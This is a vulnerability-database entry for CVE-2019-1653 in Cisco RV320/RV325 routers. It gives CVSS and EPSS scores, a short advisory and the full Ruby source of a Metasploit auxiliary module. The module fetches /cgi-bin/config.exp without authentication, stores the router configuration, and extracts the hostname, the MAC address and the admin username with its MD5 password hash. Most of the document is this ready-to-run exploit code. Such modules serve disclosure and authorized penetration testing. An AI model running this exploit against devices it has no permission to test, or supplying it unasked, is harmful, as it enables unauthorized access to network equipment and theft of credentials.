Cisco RV320/RV326 Configuration Disclosure

2019-02-0705:36:41

RedTeam Pentesting GmbH <[email protected]>, Aaron Soto <[email protected]>

www.rapid7.com

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.976

Percentile

100.0%

JSON

A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Cisco RV320/RV326 Configuration Disclosure',
      'Description'    => %q{
          A vulnerability in the web-based management interface of Cisco Small Business
          RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated,
          remote attacker to retrieve sensitive information. The vulnerability is due
          to improper access controls for URLs. An attacker could exploit this
          vulnerability by connecting to an affected device via HTTP or HTTPS and
          requesting specific URLs. A successful exploit could allow the attacker to
          download the router configuration or detailed diagnostic information. Cisco
          has released firmware updates that address this vulnerability.
        },
      'Author'         =>
        [
          'RedTeam Pentesting GmbH <[email protected]>',
          'Aaron Soto <[email protected]>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['EDB', '46262'],
          ['BID', '106732'],
          ['CVE', '2019-1653'],
          ['URL', 'https://seclists.org/fulldisclosure/2019/Jan/52'],
          ['URL', 'https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801'],
          ['URL', 'https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-20110330-acs.html']
        ],
      'DisclosureDate' => '2019-01-24',
      'DefaultOptions' =>
        {
          'SSL'   => true
        }
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'Path to the device configuration file', '/cgi-bin/config.exp']),
      ])
  end

  def report_cred(user, hash)
    service_data = {
      address: rhost,
      port: rport,
      service_name: ssl ? 'https' : 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: self.fullname,
      origin_type: :service,
      private_data: hash,
      private_type: :nonreplayable_hash,
      jtr_format: 'md5',
      username: user,
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def parse_config(config)
    # Report loot to database (and store on filesystem)
    stored_path = store_loot('cisco.rv.config', 'text/plain', rhost, config)
    print_good("Stored configuration (#{config.length} bytes) to #{stored_path}")

    # Report host information to database
    hostname = config.match(/^HOSTNAME=(.*)/)[1]
    model = config.match(/^MODEL=(.*)/)[1]
    mac = config.match(/^LANMAC=(.*)/)[1]
    mac = mac.scan(/\w{2}/).join(':')
    report_host(host: rhost,
                mac: mac,
                name: hostname,
                os_name: 'Cisco',
                os_flavor: model)

    # Report password hashes to database
    user = config.match(/^user (.*)/)[1]
    hash = config.match(/^password (.*)/)[1]
    report_cred(user, hash)
  end

  def run
    begin
      uri = normalize_uri(target_uri.path)
      res = send_request_cgi({
        'uri'     => uri,
        'method'  => 'GET',
      }, 60)
    rescue OpenSSL::SSL::SSLError
      fail_with(Failure::UnexpectedReply, 'SSL handshake failed.  Consider setting SSL to false and trying again.')
    end

    if res.nil?
      fail_with(Failure::UnexpectedReply, 'Empty response.  Please validate the RHOST and TARGETURI options and try again.')
    elsif res.code != 200
      fail_with(Failure::UnexpectedReply, "Unexpected HTTP #{res.code} response.  Please validate the RHOST and TARGETURI options and try again.")
    end

    body = res.body
    if body.match(/####sysconfig####/)
      parse_config(body)
    else body.include?"meta http-equiv=refresh content='0; url=/default.htm'"
      fail_with(Failure::NotVulnerable, 'Response suggests device is patched')
    end
  end
end